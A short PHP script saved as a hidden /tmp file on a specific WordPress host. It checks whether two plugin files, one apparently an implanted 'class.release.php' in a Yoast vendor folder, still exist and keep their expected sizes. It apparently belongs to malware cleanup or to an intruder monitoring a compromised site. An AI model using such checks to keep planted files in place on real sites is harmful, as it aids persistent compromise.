File: //tmp/.created
<?php $r = '/home/decide.family/public_html'; $x = ["/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/class.release.php"=>"bd@@191847680@@669",
"/wp-content/plugins/advanced-custom-fields/pro/fields/class-acf-field-flexible-content.php"=>"bd@@196318211@@34943"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');